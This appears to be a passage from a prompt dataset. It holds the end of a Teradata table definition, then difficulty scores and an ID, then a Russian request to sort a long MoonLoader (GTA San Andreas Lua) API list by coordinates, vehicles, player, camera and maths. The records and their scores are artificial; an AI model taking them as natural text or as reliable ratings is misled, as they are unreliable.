CUPN_STS_CD_1 CHAR(1) CHARACTER SET LATIN CASESPECIFIC,
RFISC_CD_1 CHAR(3) CHARACTER SET LATIN CASESPECIFIC,
RFIC_CD_1 CHAR(1) CHARACTER SET LATIN CASESPECIFIC,
SERV_DELV_DT_1 DATE FORMAT 'YYYY-MM-DD',
SERV_DELV_PROV_LOCN_CD_1 CHAR(8) CHARACTER SET LATIN CASESPECIFIC,
SERV_DELV_PROV_NM_1 VARCHAR(100) CHARACTER SET LATIN CASESPECIFIC,
VALU_AMT_1 BIGINT,
VALU_CRNC_1 CHAR(3) CHARACTER SET LATIN CASESPECIFIC,
OPEN_DT_1 DATE FORMAT 'YYYY-MM-DD' NOT NULL,
CLOSE_DT_1 DATE FORMAT 'YYYY-MM-DD' NOT NULL,
CNSM_AT_ISSU_IND_2 CHAR(1) CHARACTER SET LATIN CASESPECIFIC,
CUPN_TYPE_CD_2 CHAR(8) CHARACTER SET LATIN CASESPECIFIC,
MEDA_TYPE_CD_2 CHAR(8) CHARACTER SET LATIN CASESPECIFIC,
CUPN_STS_CD_2 CHAR(1) CHARACTER SET LATIN CASESPECIFIC,
RFISC_CD_2 CHAR(3) CHARACTER SET LATIN CASESPECIFIC,
RFIC_CD_2 CHAR(1) CHARACTER SET LATIN CASESPECIFIC,
SERV_DELV_DT_2 DATE FORMAT 'YYYY-MM-DD',
SERV_DELV_PROV_LOCN_CD_2 CHAR(8) CHARACTER SET LATIN CASESPECIFIC,
SERV_DELV_PROV_NM_2 VARCHAR(100) CHARACTER SET LATIN CASESPECIFIC,
VALU_AMT_2 BIGINT,
VALU_CRNC_2 CHAR(3) CHARACTER SET LATIN CASESPECIFIC,
OPEN_DT_2 DATE FORMAT 'YYYY-MM-DD' NOT NULL,
CLOSE_DT_2 DATE FORMAT 'YYYY-MM-DD' NOT NULL,
CNSM_AT_ISSU_IND_3 CHAR(1) CHARACTER SET LATIN CASESPECIFIC,
CUPN_TYPE_CD_3 CHAR(8) CHARACTER SET LATIN CASESPECIFIC,
MEDA_TYPE_CD_3 CHAR(8) CHARACTER SET LATIN CASESPECIFIC,
CUPN_STS_CD_3 CHAR(1) CHARACTER SET LATIN CASESPECIFIC,
RFISC_CD_3 CHAR(3) CHARACTER SET LATIN CASESPECIFIC,
RFIC_CD_3 CHAR(1) CHARACTER SET LATIN CASESPECIFIC,
SERV_DELV_DT_3 DATE FORMAT 'YYYY-MM-DD',
SERV_DELV_PROV_LOCN_CD_3 CHAR(8) CHARACTER SET LATIN CASESPECIFIC,
SERV_DELV_PROV_NM_3 VARCHAR(100) CHARACTER SET LATIN CASESPECIFIC,
VALU_AMT_3 BIGINT,
VALU_CRNC_3 CHAR(3) CHARACTER SET LATIN CASESPECIFIC,
OPEN_DT_3 DATE FORMAT 'YYYY-MM-DD' NOT NULL,
CLOSE_DT_3 DATE FORMAT 'YYYY-MM-DD' NOT NULL,
CNSM_AT_ISSU_IND_4 CHAR(1) CHARACTER SET LATIN CASESPECIFIC,
CUPN_TYPE_CD_4 CHAR(8) CHARACTER SET LATIN CASESPECIFIC,
MEDA_TYPE_CD_4 CHAR(8) CHARACTER SET LATIN CASESPECIFIC,
CUPN_STS_CD_4 CHAR(1) CHARACTER SET LATIN CASESPECIFIC,
RFISC_CD_4 CHAR(3) CHARACTER SET LATIN CASESPECIFIC,
RFIC_CD_4 CHAR(1) CHARACTER SET LATIN CASESPECIFIC,
SERV_DELV_DT_4 DATE FORMAT 'YYYY-MM-DD',
SERV_DELV_PROV_LOCN_CD_4 CHAR(8) CHARACTER SET LATIN CASESPECIFIC,
SERV_DELV_PROV_NM_4 VARCHAR(100) CHARACTER SET LATIN CASESPECIFIC,
VALU_AMT_4 BIGINT,
VALU_CRNC_4 CHAR(3) CHARACTER SET LATIN CASESPECIFIC,
OPEN_DT_4 DATE FORMAT 'YYYY-MM-DD' NOT NULL,
CLOSE_DT_4 DATE FORMAT 'YYYY-MM-DD' NOT NULL)
PRIMARY INDEX ( CUPN_NO ,TCKT_NO );
|
3eb14f363210a91d2a1a69b3f8588b0a
|
{
"intermediate": 0.2607470452785492,
"beginner": 0.44803091883659363,
"expert": 0.2912220060825348
}
|
45,761
|
выдели функции только как-либо связанные с координатами, координатами машины, координатами игрока, камерой, машиной, игрокой, математикой - bool result = isCursorActive()
table pickups = getAllPickups()
int handle = getPickupPointerHandle(Pickup pickup)
int pointer = getPickupPointer(Pickup pickup)
int type = getPickupType(Pickup pickup)
int model = getPickupModel(Pickup pickup)
float x, float y, float z, float w = getObjectQuaternion(Object object) (07C3)
setObjectQuaternion(Object object, float x, float y, float z, float w) (07C4)
float x, float y, float z, float w = getVehicleQuaternion(Vehicle car) (07C5)
setVehicleQuaternion(Vehicle car, float x, float y, float z, float w) (07C6)
float x, float y, float z, float w = getCharQuaternion(Ped ped)
setCharQuaternion(Ped ped, float x, float y, float z, float w)
AudioStream handle = loadAudioStream(zstring audio) (0AAC)
setAudioStreamState(AudioStream handle, int state) (0AAD)
releaseAudioStream(AudioStream handle) (0AAE)
double length = getAudioStreamLength(AudioStream handle) (0AAF)
int state = getAudioStreamState(AudioStream handle) (0AB9)
float volume = getAudioStreamVolume(AudioStream audio) (0ABB)
setAudioStreamVolume(AudioStream audio, float volume) (0ABC)
setAudioStreamLooped(AudioStream audio, bool loop) (0AC0)
AudioStream handle = load3dAudioStream(zstring audio) (0AC1)
setPlay3dAudioStreamAtCoordinates(AudioStream handle, float posX, float posY, float posZ) (0AC2)
setPlay3dAudioStreamAtObject(AudioStream audio, Object object) (0AC3)
setPlay3dAudioStreamAtChar(AudioStream audio, Ped ped) (0AC4)
setPlay3dAudioStreamAtCar(AudioStream audio, Vehicle car) (0AC5)
AudioStream handle = loadAudioStreamFromMemory(uint address, uint size)
AudioStream handle = load3dAudioStreamFromMemory(uint address, uint size)
renderDrawLine(float pos1X, float pos1Y, float pos2X, float pos2Y, float width, uint color) (0B68)
renderDrawBox(float posX, float posY, float sizeX, float sizeY, uint color) (0B69)
renderDrawBoxWithBorder(float posX, float posY, float sizeX, float sizeY, uint color, float bsize, uint bcolor) (0B6A)
float length = renderGetFontDrawTextLength(DxFont font, zstring text, [bool ignoreColorTags=false]) (0B6B)
float height = renderGetFontDrawHeight(DxFont font) (0B6C)
uint index = renderGetFontCharIndexAt(DxFont font, string text, float x, [bool ignoreColorTags=false])
float width = renderGetFontCharWidth(DxFont font, string char)
float width = renderGetFontCharWidth(DxFont font, uint char)
DxFont font = renderCreateFont(zstring font, int height, uint flags, [uint charset]) (0B6D)
renderReleaseFont(DxFont font) (0B6E)
renderFontDrawText(DxFont font, zstring text, float posX, float posY, uint color, [bool ignoreColorTags=false]) (0B6F)
renderDrawPolygon(float posX, float posY, float sizeX, float sizeY, int corners, float rotation, uint color) (0B70)
DxTexture texture = renderLoadTextureFromFile(zstring file) (0B71)
renderReleaseTexture(DxTexture texture) (0B72)
renderDrawTexture(DxTexture texture, float posX, float posY, float sizeX, float sizeY, float rotation, uint color) (0B73)
renderBegin(int type) (0C3B)
renderEnd() (0C3C)
renderColor(uint color) (0C3D)
renderVertex(float vX, float vY) (0C3E)
renderSetTexCoord(float posX, float posY) (0C3F)
renderBindTexture(DxTexture texture) (0C40)
uint struct = renderGetTextureStruct(DxTexture texture) (0C41)
uint sprite = renderGetTextureSprite(DxTexture texture) (0C42)
uint sizeX, uint sizeY = renderGetTextureSize(DxTexture texture) (0C43)
renderSetRenderState(int state, uint value) (0C44)
DxTexture texture = renderLoadTextureFromFileInMemory(uint pointer, uint size) (0C8C)
script_version_number(int version)
script_version(string version)
script_name(string name)
script_description(string description)
script_authors(string author, ...)
script_author(string author)
script_dependencies(string name, ...)
script_moonloader(int version)
LuaScript s = thisScript()
wait(int time) (0001)
print(any value, ...)
int value = getGameGlobal(int index)
setGameGlobal(int index, int value)
uint ptr = getGameGlobalPtr(int index)
bool loaded = isSampfuncsLoaded()
bool loaded = isCleoLoaded()
bool loaded = isSampLoaded()
bool state = isKeyDown(int keyId) (0AB0)
reloadScripts()
bool status = isOpcodesAvailable()
int i = representFloatAsInt(float f)
float i = representIntAsFloat(int i)
setGxtEntry(string key, string text) (0ADF)
string key = setFreeGxtEntry(string text)
string key = getFreeGxtKey()
string text = getGxtText(string key) (0ADE)
clearGxtEntry(string key) (0AE0)
bool active = isPauseMenuActive()
bool foreground = isGameWindowForeground()
int major, int minor, int majorRev, int minorRev, int game, int region, bool steam, bool cracked = getGameVersion()
int version = getMoonloaderVersion()
double time = localClock()
freeTextures()
string path = getWorkingDirectory()
string path = getGameDirectory()
useRenderCommands(bool enable) (03F0)
writeMemory(uint address, uint size, int value, bool virtualProtect) (0A8C)
int value = readMemory(uint address, uint size, bool virtualProtect) (0A8D)
bool result, uint handle = loadDynamicLibrary(string library) (0AA2)
freeDynamicLibrary(uint handle) (0AA3)
bool result, uint proc = getDynamicLibraryProcedure(string proc, uint handle) (0AA4)
bool result = doesFileExist(string file) (0AAB)
bool result = doesDirectoryExist(string directory) (0AE4)
bool result = createDirectory(string directory) (0AE5)
float val = popFloat() (0AE9)
bool result = isGameVersionOriginal() (0AA9)
uint memory = allocateMemory(uint size) (0AC8)
freeMemory(uint memory) (0AC9)
Filesearch handle, string name = findFirstFile(string mask) (0AE6)
string file = findNextFile(Filesearch handle) (0AE7)
findClose(Filesearch handle) (0AE8)
bool result, Ped ped = findAllRandomCharsInSphere(float posX, float posY, float posZ, float radius, bool findNext, bool skipDead) (0AE1)
bool result, Vehicle car = findAllRandomVehiclesInSphere(float posX, float posY, float posZ, float radius, bool findNext, bool skipWrecked) (0AE2)
bool result, Object object = findAllRandomObjectsInSphere(float posX, float posY, float posZ, float radius, bool findNext) (0AE3)
uint ptr = getCharPointer(Ped ped) (0A96)
uint ptr = getCarPointer(Vehicle car) (0A97)
uint struct = getObjectPointer(Object object) (0A98)
int returnValue = callFunction(uint address, int params, int pop, ...) (0AA7)
int returnValue = callMethod(uint address, int struct, int params, int pop, ...) (0AA8)
Vehicle car, Ped ped = storeClosestEntities(Ped ped) (0AB5)
switchCarEngine(Vehicle car, bool state) (0ABF)
bool result, float posX, float posY, float posZ = getTargetBlipCoordinates() (0AB6)
int gears = getCarNumberOfGears(Vehicle car) (0AB7)
int gear = getCarCurrentGear(Vehicle car) (0AB8)
bool state = isCarSirenOn(Vehicle car) (0ABD)
bool state = isCarEngineOn(Vehicle car) (0ABE)
printHelpString(string text) (0ACA)
printStyledString(string text, int time, int style) (0ACB)
printString(string text, int time) (0ACC)
printStringNow(string text, int time) (0ACD)
bool result, Ped ped = getCharPlayerIsTargeting(Player player) (0AD2)
GxtString name = getNameOfVehicleModel(Model modelId) (0ADB)
bool result = testCheat(string text) (0ADC)
bool result = spawnVehicleByCheating(Model modelId) (0ADD)
Ped handle = getCharPointerHandle(uint ptr) (0AEA)
Vehicle handle = getVehiclePointerHandle(uint ptr) (0AEB)
Object handle = getObjectPointerHandle(uint ptr) (0AEC)
bool result, table colPoint = processLineOfSight(float originX, float originY, float originZ, float targetX, float targetY, float targetZ, [bool checkSolid=true], [bool car=false], [bool ped=false], [bool object=false], [bool particle=false], [bool seeThrough=false], [bool ignoreSomeObjects=false], [bool shootThrough=false]) (0BFF)
bool result = setClipboardText(string text) (0C8D)
string text = getClipboardText() (0C8E)
int value = getStructElement(uint struct, int offset, uint size, [bool unprotect=false]) (0C0C)
setStructElement(uint struct, int offset, uint size, int value, [bool unprotect=false]) (0C0D)
float w, float x, float y, float z = convertMatrixToQuaternion(float rightX, float rightY, float rightZ, float frontX, float frontY, float frontZ, float upX, float upY, float upZ) (0C32)
float rightX, float rightY, float rightZ, float frontX, float frontY, float frontZ, float upX, float upY, float upZ = convertQuaternionToMatrix(float w, float x, float y, float z) (0C33)
float wposX, float wposY = convert3DCoordsToScreen(float posX, float posY, float posZ) (0B55)
setGameKeyState(int key, int state) (0B56)
int posX, int posY = getCursorPos() (0B5E)
float gposX, float gposY = convertWindowScreenCoordsToGameScreenCoords(float wposX, float wposY) (0B5F)
float wposX, float wposY = convertGameScreenCoordsToWindowScreenCoords(float gposX, float gposY) (0B60)
float posX, float posY, float posZ = convertScreenCoordsToWorld3D(float posX, float posY, float depth) (0B8F)
uint handle = getModuleHandle(string module) (0C70)
uint address = getModuleProcAddress(string module, string proc) (0C71)
setVirtualKeyDown(int vkey, bool down) (0C72)
setCharKeyDown(int ckey, bool down) (0C73)
int index = downloadUrlToFile(string url, string file, function statusCallback) (0C65)
bool state = isKeyJustPressed(int key) (0C89)
bool result, float x, float y, float z, float w, float h = convert3DCoordsToScreenEx(float posX, float posY, float posZ, [bool checkMin=false], [bool checkMax=false])
float value = getStructFloatElement(uint struct, int offset, [bool unprotect=false])
setStructFloatElement(uint struct, int offset, float value, [bool unprotect=false])
bool state = wasKeyPressed(int key)
bool state = wasKeyReleased(int key)
int delta = getMousewheelDelta()
consumeWindowMessage([bool game=true], [bool scripts=true])
addEventHandler(string eventName, function callback)
bool paused = isGamePaused()
double time = gameClock()
script_properties(string property, ...)
script_url(string url)
any imports = import(string filename)
string json = encodeJson(table data)
table data = decodeJson(string json)
showCursor(bool show, [bool lockControls])
lockPlayerControl(bool lock)
bool locked = isPlayerControlLocked()
bool result = setBlipCoordinates(Marker blip, float x, float y, float z)
bool result = setTargetBlipCoordinates(float x, float y, float z)
bool result = placeWaypoint(float x, float y, float z)
bool result = removeWaypoint()
string path = getFolderPath(int csidl)
float value = getTimeStepValue()
uint devicePtr = getD3DDevicePtr()
table objects = getAllObjects()
table peds = getAllChars()
table vehicles = getAllVehicles()
float value = getGameGlobalFloat(int index)
setGameGlobalFloat(int index, float value)
LuaScript s = script.load(string file)
LuaScript s = script.find(string name)
table list = script.list()
LuaScript script = script.get(int scriptId)
script.this
table data = inicfg.load([table default], [string file])
bool result = inicfg.save(table data, [string file])
int value = memory.read(uint address, uint size, [bool unprotect=false])
memory.write(uint address, int value, uint size, [bool unprotect=false])
int value = memory.getint8(uint address, [bool unprotect=false])
bool result = memory.setint8(uint address, int byte, [bool unprotect=false])
int value = memory.getint16(uint address, [bool unprotect=false])
bool result = memory.setint16(uint address, int word, [bool unprotect=false])
int value = memory.getint32(uint address, [bool unprotect=false])
bool result = memory.setint32(uint address, int dword, [bool unprotect=false])
double value = memory.getint64(uint address, [bool unprotect=false])
bool result = memory.setint64(uint address, double qword, [bool unprotect=false])
int value = memory.getuint8(uint address, [bool unprotect=false])
bool result = memory.setuint8(uint address, int byte, [bool unprotect=false])
int value = memory.getuint16(uint address, [bool unprotect=false])
bool result = memory.setuint16(uint address, int word, [bool unprotect=false])
int value = memory.getuint32(uint address, [bool unprotect=false])
bool result = memory.setuint32(uint address, int dword, [bool unprotect=false])
double value = memory.getuint64(uint address, [bool unprotect=false])
bool result = memory.setuint64(uint address, double qword, [bool unprotect=false])
float value = memory.getfloat(uint address, [bool unprotect=false])
bool result = memory.setfloat(uint address, float value, [bool unprotect=false])
double value = memory.getdouble(uint address, [bool unprotect=false])
bool result = memory.setdouble(uint address, double value, [bool unprotect=false])
int oldProtection = memory.unprotect(uint address, uint size)
int oldProtection = memory.protect(uint address, uint size, int newProtection)
memory.copy(uint destAddress, uint srcAddress, uint size, [bool unprotect=false]) (0C10)
bool result = memory.compare(uint address1, uint address2, uint size, [bool unprotect=false]) (0C12)
string str = memory.tostring(uint address, [uint size], [bool unprotect=false])
string hexstr = memory.tohex(uint address, uint size, [bool unprotect=false]) (0C22)
bool result = memory.hex2bin(string hex, uint dstAddress, uint size) (0C23)
string bin = memory.hex2bin(string hex)
memory.fill(uint address, int value, uint size, [bool unprotect=false]) (0C11)
uint address = memory.strptr(string str)
LuaThread thread = lua_thread.create(function func, ...)
LuaThread thread = lua_thread.create_suspended(function func)
shakeCam(int shake) 0003
Player player = createPlayer(Model modelId, float atX, float atY, float atZ) 0053
Ped ped = createChar(int pedtype, Model modelId, float atX, float atY, float atZ) 009A
deleteChar(Ped ped) 009B
float positionX, float positionY, float positionZ = getCharCoordinates(Ped ped) 00A0
setCharCoordinates(Ped ped, float posX, float posY, float posZ) 00A1
bool result = isCharInArea2d(Ped ped, float cornerAX, float cornerAY, float cornerBX, float cornerBY, bool sphere) 00A3
bool result = isCharInArea3d(Ped ped, float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ, bool sphere) 00A4
Vehicle car = createCar(Model modelId, float atX, float atY, float atZ) 00A5
deleteCar(Vehicle car) 00A6
carGotoCoordinates(Vehicle car, float driveToX, float driveToY, float driveToZ) 00A7
carWanderRandomly(Vehicle car) 00A8
carSetIdle(Vehicle car) 00A9
float positionX, float positionY, float positionZ = getCarCoordinates(Vehicle car) 00AA
setCarCoordinates(Vehicle car, float atX, float atY, float atZ) 00AB
setCarCruiseSpeed(Vehicle car, float maxSpeed) 00AD
setCarDrivingStyle(Vehicle car, int behaviour) 00AE
setCarMission(Vehicle car, int driverBehaviour) 00AF
bool result = isCarInArea2d(Vehicle car, float cornerAX, float cornerAY, float cornerBX, float cornerBY, bool sphere) 00B0
bool result = isCarInArea3d(Vehicle car, float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ, bool sphere) 00B1
printBig(GxtString gxtString, int time, int style) 00BA
printText(GxtString gxtString, int time, int flag) 00BB
printTextNow(GxtString gxtString, int time, int flag) 00BC
clearPrints() 00BE
int hours, int mins = getTimeOfDay() 00BF
setTimeOfDay(int hours, int minutes) 00C0
int minutes = getMinutesToTimeOfDay(int hours, int minutes) 00C1
bool result = isPointOnScreen(float sphereX, float sphereY, float sphereZ, float radius) 00C2
Vehicle car = storeCarCharIsIn(Ped ped) 00D9
bool result = isCharInCar(Ped ped, Vehicle car) 00DB
bool result = isCharInModel(Ped ped, Model carModel) 00DD
bool result = isCharInAnyCar(Ped ped) 00DF
bool result = isButtonPressed(Player player, int key) 00E1
int state = getPadState(Player player, int key) 00E2
bool result = locateCharAnyMeans2d(Ped ped, float pointX, float pointY, float radiusX, float radiusY, bool sphere) 00EC
bool result = locateCharOnFoot2d(Ped ped, float pointX, float pointY, float radiusX, float radiusY, bool sphere) 00ED
bool result = locateCharInCar2d(Ped ped, float pointX, float pointY, float radiusX, float radiusY, bool sphere) 00EE
bool result = locateStoppedCharAnyMeans2d(Ped ped, float pointX, float pointY, float radiusX, float radiusY, bool sphere) 00EF
bool result = locateStoppedCharOnFoot2d(Ped ped, float pointX, float pointY, float radiusX, float radiusY, bool sphere) 00F0
bool result = locateStoppedCharInCar2d(Ped ped, float pointX, float pointY, float radiusX, float radiusY, bool sphere) 00F1
bool result = locateCharAnyMeansChar2d(Ped ped, Ped nearPed, float radiusX, float radiusY, bool sphere) 00F2
locateCharOnFootChar2d(Ped ped, Ped nearPed, float radiusX, float radiusY, bool sphere) 00F3
bool result = locateCharInCarChar2d(Ped ped, Ped nearPed, float radiusX, float radiusY, bool sphere) 00F4
bool result = locateCharAnyMeans3d(Ped ped, float sphereX, float sphereY, float sphereZ, float radiusX, float radiusY, float radiusZ, bool sphere) 00FE
bool result = locateCharOnFoot3d(Ped ped, float sphereX, float sphereY, float sphereZ, float radiusX, float radiusY, float radiusZ, bool sphere) 00FF
bool result = locateCharInCar3d(Ped ped, float sphereX, float sphereY, float sphereZ, float radiusX, float radiusY, float radiusZ, bool sphere) 0100
bool result = locateStoppedCharAnyMeans3d(Ped ped, float sphereX, float sphereY, float sphereZ, float radiusX, float radiusY, float radiusZ, bool sphere) 0101
bool result = locateStoppedCharOnFoot3d(Ped ped, float sphereX, float sphereY, float sphereZ, float radiusX, float radiusY, float radiusZ, bool sphere) 0102
bool result = locateStoppedCharInCar3d(Ped ped, float sphereX, float sphereY, float sphereZ, float radiusX, float radiusY, float radiusZ, bool sphere) 0103
bool result = locateCharAnyMeansChar3d(Ped ped, Ped nearPed, float radiusX, float radiusY, float radiusZ, bool sphere) 0104
bool result = locateCharOnFootChar3d(Ped ped, Ped nearPed, float radiusX, float radiusY, float radiusZ, bool sphere) 0105
bool result = locateCharInCarChar3d(Ped ped, Ped nearPed, float radiusX, float radiusY, float radiusZ, bool sphere) 0106
Object object = createObject(Model modelId, float atX, float atY, float atZ) 0107
deleteObject(Object object) 0108
givePlayerMoney(Player player, int money) 0109
int money = getPlayerMoney(Player player) 010B
giveRemoteControlledCarToPlayer(Player player, float float2, float float3, float float4) 010C
alterWantedLevel(Player player, int wantedLevel) 010D
alterWantedLevelNoDrop(Player player, int minimumWantedLevel) 010E
bool result = isWantedLevelGreater(Player player, int level) 010F
clearWantedLevel(Player player) 0110
setDeatharrestState(bool value) 0111
bool result = hasDeatharrestBeenExecuted() 0112
addAmmoToChar(Ped ped, int weapon, int ammo) 0114
bool result = isPlayerDead(Player player) 0117
bool result = isCharDead(Ped ped) 0118
bool result = isCarDead(Vehicle car) 0119
bool result = isPlayerPressingHorn(Player player) 0122
Ped ped = createCharInsideCar(Vehicle car, Model pedtype, int model) 0129
bool result = isCarModel(Vehicle car, Model modelId) 0137
int carGenerator = createCarGenerator(float atX, float atY, float atZ, float angle, Model modelId, int color1, int color2, bool forceSpawn, int alarm, int doorLock, int minDelay, int maxDelay) 014B
switchCarGenerator(int carGenerator, int carsToGenerate) 014C
displayOnscreenTimer(VarId var, bool countInDirection) 014E
clearOnscreenTimer(VarId var) 014F
clearOnscreenCounter(VarId var) 0151
bool result = isCharInZone(Ped ped, GxtString zoneName) 0154
pointCameraAtCar(Vehicle car, int mode, int switchstyle) 0158
pointCameraAtChar(Ped ped, int mode, int switchstyle) 0159
restoreCamera() 015A
shakePad(Player player, int time, int intensity) 015B
setTimeScale(float gamespeed) 015D
setFixedCameraPosition(float positionX, float positionY, float positionZ, float rotationX, float rotationY, float rotationZ) 015F
pointCameraAtPoint(float pointAtX, float pointAtY, float pointAtZ, int switchstyle) 0160
Marker marker = addBlipForCarOld(Vehicle car, int unused, bool visibility) 0161
Marker marker = addBlipForCharOld(Ped ped, int int2, int int3) 0162
removeBlip(Marker marker) 0164
changeBlipColour(Marker marker, int color) 0165
Marker marker = addBlipForCoordOld(float atX, float atY, float atZ, int color, int flag) 0167
changeBlipScale(Marker marker, int size) 0168
setFadingColour(int r, int g, int b) 0169
doFade(bool in, int time) 016A
bool result = getFadingStatus() 016B
addHospitalRestart(float atX, float atY, float atZ, float angle, int townNumber) 016C
addPoliceRestart(float atX, float atY, float atZ, float angle, int townNumber) 016D
overrideNextRestart(float atX, float atY, float atZ, float angle) 016E
drawShadow(Particle particle, float atX, float atY, float atZ, float rotationFactor, float size, int intensity, int flags1, int flags2, int flags3) 016F
float angle = getCharHeading(Ped ped) 0172
setCharHeading(Ped ped, float angle) 0173
float angle = getCarHeading(Vehicle car) 0174
setCarHeading(Vehicle car, float angle) 0175
float angle = getObjectHeading(Object object) 0176
setObjectHeading(Object object, float angle) 0177
bool result = isCharTouchingObject(Ped ped, Object object) 0179
setCharAmmo(Ped ped, int weapon, int ammo) 017B
declareMissionFlag(VarId flag) 0180
Marker marker = addBlipForCar(Vehicle car) 0186
Marker marker = addBlipForChar(Ped ped) 0187
Marker marker = addBlipForObject(Object object) 0188
Checkpoint checkpoint = addBlipForCoord(float atX, float atY, float atZ) 018A
changeBlipDisplay(Marker marker, int mode) 018B
addOneOffSound(float atX, float atY, float atZ, int sound) 018C
int unk = addContinuousSound(float atX, float atY, float atZ, int sound) 018D
removeSound(int sound) 018E
bool result = isCarStuckOnRoof(Vehicle car) 018F
addUpsidedownCarCheck(Vehicle car) 0190
removeUpsidedownCarCheck(Vehicle car) 0191
bool result = isCharInAreaOnFoot2d(Ped ped, float cornerAX, float cornerAY, float cornerBX, float cornerBY, bool sphere) 01A1
bool result = isCharInAreaInCar2d(Ped ped, float cornerAX, float cornerAY, float cornerBX, float cornerBY, bool sphere) 01A2
bool result = isCharStoppedInArea2d(Ped ped, float cornerAX, float cornerAY, float cornerBX, float cornerBY, bool sphere) 01A3
bool result = isCharStoppedInAreaOnFoot2d(Ped ped, float cornerAX, float cornerAY, float cornerBX, float cornerBY, bool sphere) 01A4
bool result = isCharStoppedInAreaInCar2d(Ped ped, float cornerAX, float cornerAY, float cornerBX, float cornerBY, bool sphere) 01A5
bool result = isCharInAreaOnFoot3d(Ped ped, float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ, bool sphere) 01A6
bool result = isCharInAreaInCar3d(Ped ped, float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ, bool sphere) 01A7
bool result = isCharStoppedInArea3d(Ped ped, float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ, bool sphere) 01A8
bool result = isCharStoppedInAreaOnFoot3d(Ped ped, float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ, bool sphere) 01A9
bool result = isCharStoppedInAreaInCar3d(Ped ped, float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ, bool sphere) 01AA
bool result = isCarStoppedInArea2d(Vehicle car, float cornerAX, float cornerAY, float cornerBX, float cornerBY, bool sphere) 01AB
bool result = isCarStoppedInArea3d(Vehicle car, float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ, bool sphere) 01AC
bool result = locateCar2d(Vehicle car, float pointX, float pointY, float radiusX, float radiusY, bool sphere) 01AD
bool result = locateStoppedCar2d(Vehicle car, float pointX, float pointY, float radiusX, float radiusY, bool sphere) 01AE
bool result = locateCar3d(Vehicle car, float sphereX, float sphereY, float sphereZ, float radiusX, float radiusY, float radiusZ, bool sphere) 01AF
bool result = locateStoppedCar3d(Vehicle car, float sphereX, float sphereY, float sphereZ, float radiusX, float radiusY, float radiusZ, bool sphere) 01B0
giveWeaponToChar(Ped ped, int weapon, int ammo) 01B2
bool result = setPlayerControl(Player player, bool canMove) 01B4
bool result = forceWeather(int weather) 01B5
bool result = forceWeatherNow(int weather) 01B6
releaseWeather() 01B7
setCurrentCharWeapon(Ped ped, int weapon) 01B9
bool result, float positionX, float positionY, float positionZ = getObjectCoordinates(Object object) 01BB
bool result = setObjectCoordinates(Object object, float atX, float atY, float atZ) 01BC
int timeMs = getGameTimer() 01BD
bool result, int level = storeWantedLevel(Player player) 01C0
bool result = isCarStopped(Vehicle car) 01C1
markCharAsNoLongerNeeded(Ped ped) 01C2
markCarAsNoLongerNeeded(Vehicle car) 01C3
markObjectAsNoLongerNeeded(Object object) 01C4
dontRemoveChar(Ped ped) 01C5
dontRemoveObject(Object object) 01C7
bool result, Ped ped = createCharAsPassenger(Vehicle car, Model pedtype, int model, int passengerSeat) 01C8
bool result = printWithNumberBig(GxtString gxtString, int number, int time, int style) 01E3
bool result = printWithNumber(GxtString gxtString, int number, int time, int flag) 01E4
bool result = printWithNumberNow(GxtString gxtString, int number, int time, int flag) 01E5
bool result = switchRoadsOn(float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ) 01E7
switchRoadsOff(float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ) 01E8
bool result, int passengers = getNumberOfPassengers(Vehicle car) 01E9
int maxPassengers = getMaximumNumberOfPassengers(Vehicle car) 01EA
bool result = setCarDensityMultiplier(float multiplier) 01EB
bool result = setCarHeavy(Vehicle car, bool heavy) 01EC
setMaxWantedLevel(int level) 01F0
bool result = isCarInAirProper(Vehicle car) 01F3
bool result = isCarUpsidedown(Vehicle car) 01F4
bool result, Ped ped = getPlayerChar(Player player) 01F5
bool result = cancelOverrideRestart() 01F6
bool result = setPoliceIgnorePlayer(Player player, bool ignored) 01F7
bool result = startKillFrenzy(GxtString gxtString, int weapon, int timeLimit, int targets, Model targetModels1, Model targetModels2, Model targetModels3, Model targetModels4, bool completedText) 01F9
bool result, int status = readKillFrenzyStatus() 01FA
bool result = locateCharAnyMeansCar2d(Ped ped, Vehicle car, float radiusX, float radiusY, bool sphere) 0202
bool result = locateCharOnFootCar2d(Ped ped, Vehicle car, float radiusX, float radiusY, bool flag) 0203
bool result = locateCharInCarCar2d(Ped ped, Vehicle car, float radiusX, float radiusY, bool sphere) 0204
bool result = locateCharAnyMeansCar3d(Ped ped, Vehicle car, float radiusX, float radiusY, float radiusZ, bool flag) 0205
bool result = locateCharOnFootCar3d(Ped ped, Vehicle car, float radiusX, float radiusY, float radiusZ, bool flag) 0206
bool result = locateCharInCarCar3d(Ped ped, Vehicle car, float radiusX, float radiusY, float radiusZ, bool flag) 0207
lockCarDoors(Vehicle car, int status) 020A
bool result = explodeCar(Vehicle car) 020B
bool result = addExplosion(float atX, float atY, float atZ, int radius) 020C
bool result = isCarUpright(Vehicle car) 020D
bool result, Pickup pickup = createPickup(Model modelId, int type, float atX, float atY, float atZ) 0213
bool result = hasPickupBeenCollected(Pickup pickup) 0214
bool result = removePickup(Pickup pickup) 0215
bool result = setTaxiLights(Vehicle taxi, bool light) 0216
bool result = printBigQ(GxtString gxtString, int time, int style) 0217
bool result = setTargetCarForMissionGarage(GxtString garage, Vehicle car) 021B
bool result = applyBrakesToPlayersCar(Player player, bool apply) 0221
setCharHealth(Ped ped, int health) 0223
setCarHealth(Vehicle car, int health) 0224
int health = getCharHealth(Ped ped) 0226
int health = getCarHealth(Vehicle car) 0227
bool result = changeCarColour(Vehicle car, int primaryColor, int secondaryColor) 0229
switchPedRoadsOn(float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ) 022A
switchPedRoadsOff(float cornerAX, float cornerAY, float cornerAZ, float cornerBX, float cornerBY, float cornerBZ) 022B
setGangWeapons(int gang, int weapons1, int weapons2, int weapons3) 0237
bool result = isCharTouchingObjectOnFoot(Ped ped, Object object) 023B
